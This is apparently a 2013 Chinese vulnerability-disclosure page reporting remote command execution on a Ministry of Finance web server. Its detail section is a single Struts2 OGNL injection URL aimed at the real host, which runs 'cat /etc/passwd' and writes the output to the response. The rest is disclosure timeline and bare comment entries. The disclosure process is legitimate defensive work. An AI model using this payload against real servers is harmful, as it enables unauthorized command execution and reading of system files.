漏洞概要
关注数(24)
关注此漏洞
漏洞标题:中华人民共和国财政部存在远程命令执行
提交时间:2013-07-17 16:46
修复时间:2013-08-31 16:47
公开时间:2013-08-31 16:47
漏洞类型:命令执行
危害等级:中
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2013-07-17: 细节已通知厂商并且等待厂商处理中
2013-07-21: 厂商已经确认,细节仅向厂商公开
2013-07-31: 细节向核心白帽子及相关领域专家公开
2013-08-10: 细节向普通白帽子公开
2013-08-20: 细节向实习白帽子公开
2013-08-31: 细节向公众公开
简要描述:
中华人民共和国财政部存在远程命令执行
详细说明:
http://qcxx.mof.gov.cn/public.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:7
确认时间:2013-07-21 21:58
厂商回复:
最新状态:
暂无
漏洞评价:
评论
-
2013-07-17 16:54 |
nick被注册 ( 普通白帽子 | Rank:125 漏洞数:20 | 天一)
-
2013-07-17 17:15 |
Major ( 实习白帽子 | Rank:42 漏洞数:7 | 我是来溢出的···卡吗?AAAAAAAAAAAAAAAA...)
-
2013-07-17 17:32 |
izj ( 路人 | Rank:7 漏洞数:3 | 爱老婆)
-
2013-07-17 17:48 |
脚本小伙 ( 实习白帽子 | Rank:52 漏洞数:15 | 小书童)
-
2013-07-17 22:12 |
tenzy ( 普通白帽子 | Rank:176 漏洞数:21 | Need not to know)
-
2013-07-18 08:09 |
逍遥 ( 普通白帽子 | Rank:127 漏洞数:40 | 屌丝一个,求基友!)
-
2013-07-22 01:43 |
Huc-Unis ( 普通白帽子 | Rank:1055 漏洞数:292 | 诶,现在通用奖励越来越低了;离买保时捷卡...)